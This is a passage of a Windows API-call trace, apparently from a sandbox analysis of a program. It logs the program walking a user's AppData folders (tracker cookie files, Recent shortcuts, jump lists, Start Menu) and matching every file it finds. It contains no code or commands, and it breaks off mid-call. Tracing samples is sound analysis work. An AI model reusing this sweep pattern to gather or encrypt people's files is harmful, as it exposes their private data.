(pszFile="aetadzjz@casalemedia[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@connextra[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@crwdcntrl[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@demdex[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@doubleclick[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@dpm.demdex[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@exelator[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@eyeota[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@google[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@ibeu2.mookie1[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@ih.adscale[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@linkedin[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@m.exactag[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@mathtag[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@microsoft[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@msn[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@openx[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@pixel.rubiconproject[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@pubmatic[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@rubiconproject[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@scorecardresearch[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@semasio[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@server.adformdsp[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@serving-sys[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@serving.experianmarketingservices[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@smartadserver[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@tapad[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@track.adform[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@turn[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@w55c[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@www.bing[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@www.linkedin[1].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="aetadzjz@www.msn[2].txt", pszSpec="*") returned 1 [0083.228] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.229] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.229] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.229] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="IECompatCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache" [0083.229] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*" [0083.229] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.230] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low" [0083.230] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*" [0083.230] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.230] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.230] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.230] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="IETldCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache" [0083.230] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*" [0083.230] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.230] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.230] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low" [0083.230] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*" [0083.230] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.230] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.230] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.230] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.231] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Libraries" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries" [0083.231] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0083.231] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.231] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.231] PathMatchSpecW (pszFile="Documents.library-ms", pszSpec="*") returned 1 [0083.231] PathMatchSpecW (pszFile="Music.library-ms", pszSpec="*") returned 1 [0083.231] PathMatchSpecW (pszFile="Pictures.library-ms", pszSpec="*") returned 1 [0083.231] PathMatchSpecW (pszFile="Videos.library-ms", pszSpec="*") returned 1 [0083.231] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.231] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Network Shortcuts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts" [0083.231] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0083.231] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.231] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.231] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Printer Shortcuts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts" [0083.231] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0083.231] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.231] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.231] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="PrivacIE" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE" [0083.232] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*" [0083.232] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.232] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.232] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low" [0083.232] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*" [0083.232] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.232] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.232] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.232] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.232] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Recent" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent" [0083.232] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*" [0083.232] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.233] PathMatchSpecW (pszFile="-30A.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="-K1l.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="-m__HyY.flv.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="0bDrkJM8XXXnFRxfDg.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="0DNjPat.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="2Nixhtrz2gmyV.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="2w0hahW-zduMFuM.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="3iTBagJh1TzGAF.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="3why64Tae9g8c4VdM8du.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="4GnnIG6RdLOiij.mkv.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="4K6vEar.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="4QH68b0VZVmVea.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="4zHejp QLa ZE2pa cH.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="5mCV5OJINb0by_M.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="66JSU-GMFXebztL6ygQU.mkv.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="6s KHOwEGy9S7Ui.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="6ZmZ0xKozu28.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="6zu4TtZ9V.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="7BO3.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="7HjWJR_LGMvzxmbh11.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="8bX-DpXHK5F2Jt08OT.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="8DKSg5L.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="8IX078BF_yA.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="8W9SovSulzKgG_lNSllO.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="9rKKEdWHzAr2h.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="9sVjW_9SxQBpOlFRynwd.lnk", pszSpec="*") returned 1 [0083.233] PathMatchSpecW (pszFile="9XjB ynfFlmJrlu8uy.lnk", pszSpec="*") returned 1 [0083.234] PathMatchSpecW (pszFile="A2W4hWIo9JNOPgMLEbON.lnk", pszSpec="*") returned 1 [0083.234] PathMatchSpecW (pszFile="A3eTpG3yiuj.lnk", pszSpec="*") returned 1 [0083.234] PathMatchSpecW (pszFile="Ab9hH.mkv.lnk", pszSpec="*") returned 1 [0083.234] PathMatchSpecW (pszFile="AmGzCyfE3UJ.lnk", pszSpec="*") returned 1 [0083.234] PathMatchSpecW (pszFile="AtpEIf_3ro-.lnk", pszSpec="*") returned 1 [0083.234] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="AutomaticDestinations" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations" [0083.234] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" [0083.234] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.234] PathMatchSpecW (pszFile="1b4dd67f29cb1962.automaticDestinations-ms", pszSpec="*") returned 1 [0083.234] PathMatchSpecW (pszFile="7e4dca80246863e3.automaticDestinations-ms", pszSpec="*") returned 1 [0083.234] PathMatchSpecW (pszFile="9b9cdc69c1c24e2b.automaticDestinations-ms", pszSpec="*") returned 1 [0083.234] PathMatchSpecW (pszFile="eb282ead62b4db87.automaticDestinations-ms", pszSpec="*") returned 1 [0083.234] PathMatchSpecW (pszFile="fb3b0dbfee58fac8.automaticDestinations-ms", pszSpec="*") returned 1 [0083.234] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.235] PathMatchSpecW (pszFile="B4honwPP90ft9NBJsJ.flv.lnk", pszSpec="*") returned 1 [0083.235] PathMatchSpecW (pszFile="BDa5B4GVrREPMxye24.lnk", pszSpec="*") returned 1 [0083.235] PathMatchSpecW (pszFile="BQbMQWsA.lnk", pszSpec="*") returned 1 [0083.235] PathMatchSpecW (pszFile="bwFwGum5_tu.lnk", pszSpec="*") returned 1 [0083.235] PathMatchSpecW (pszFile="cDuwllOG1a13fdUSRtyT.lnk", pszSpec="*") returned 1 [0083.235] PathMatchSpecW (pszFile="CJ3VRj.lnk", pszSpec="*") returned 1 [0083.235] PathMatchSpecW (pszFile="CNyryAkAB.lnk", pszSpec="*") returned 1 [0083.235] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="CustomDestinations" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations" [0083.235] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" [0083.235] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.236] PathMatchSpecW (pszFile="1b4dd67f29cb1962.customDestinations-ms", pszSpec="*") returned 1 [0083.236] PathMatchSpecW (pszFile="590aee7bdd69b59b.customDestinations-ms", pszSpec="*") returned 1 [0083.236] PathMatchSpecW (pszFile="5afe4de1b92fc382.customDestinations-ms", pszSpec="*") returned 1 [0083.236] PathMatchSpecW (pszFile="7e4dca80246863e3.customDestinations-ms", pszSpec="*") returned 1 [0083.236] PathMatchSpecW (pszFile="969252ce11249fdd.customDestinations-ms", pszSpec="*") returned 1 [0083.236] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.237] PathMatchSpecW (pszFile="Cwm2k.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="Ea27DuZ.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="eo9uwSYwbQ8w-H9nZNH.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="f9Kz7FajrZe1D3cJu.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="f9qMY.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="fekn9-cYjXE.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="fI8HtTYnLk.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="fvW2_oNzD WbqiCr-MPh.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="fWYvTfhZ8pDF fugPxx.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="fyH-uEyk.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="GerI56Fqfwp_.mkv.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="GfolyaPf5e_.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="GniRADlcdXM4e2NV8Q9.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="gSeMslrV-UMnw.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="GWgVhSNyFu dKu.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="gXiF8Ie492m0IXBb.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="hW8kL.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="HxDmDA2.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="i5O0_LIU2IZEasfZ7kGw.ots.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="IjwM7q33.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="iOIPdOtfzh B E9C.mkv.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="ItqxY4z Y 4rVAHIrmZY.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="jzyu_DZ Ndc.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="k-_w4gLllVwoL83pf.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="k9t4FeIHN.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="kAq1- 39jYRD61eR-q W.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="kBFP3Db2Q.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="L s6Njtmvi.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="LmPLyJ2Ow.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="m3h5tfwIa0qf.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="mctbo0q.flv.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="Me7y1usyGmJu.flv.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="MexIfyKM-sbW8O.lnk", pszSpec="*") returned 1 [0083.237] PathMatchSpecW (pszFile="mtkGNF4Nxp1Jq.lnk", pszSpec="*") returned 1 [0083.238] PathMatchSpecW (pszFile="My Music.lnk", pszSpec="*") returned 1 [0083.238] PathMatchSpecW (pszFile="My Pictures.lnk", pszSpec="*") returned 1 [0083.238] PathMatchSpecW (pszFile="My Videos.lnk", pszSpec="*") returned 1 [0083.238] PathMatchSpecW (pszFile="NDKwV1zojdnIvD.lnk", pszSpec="*") returned 1 [0083.238] PathMatchSpecW (pszFile="OxDXUrN_NRgHCzwB.lnk", pszSpec="*") returned 1 [0083.238] PathMatchSpecW (pszFile="p7a41UXJZx6F.lnk", pszSpec="*") returned 1 [0083.238] PathMatchSpecW (pszFile="phnRpW6kd Nm7RGooNCL.lnk", pszSpec="*") returned 1 [0083.238] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.238] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="SendTo" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo" [0083.238] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*" [0083.238] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.239] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.239] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Start Menu" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu" [0083.239] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*" [0083.239] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.239] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="Programs" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs" [0083.239] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*") 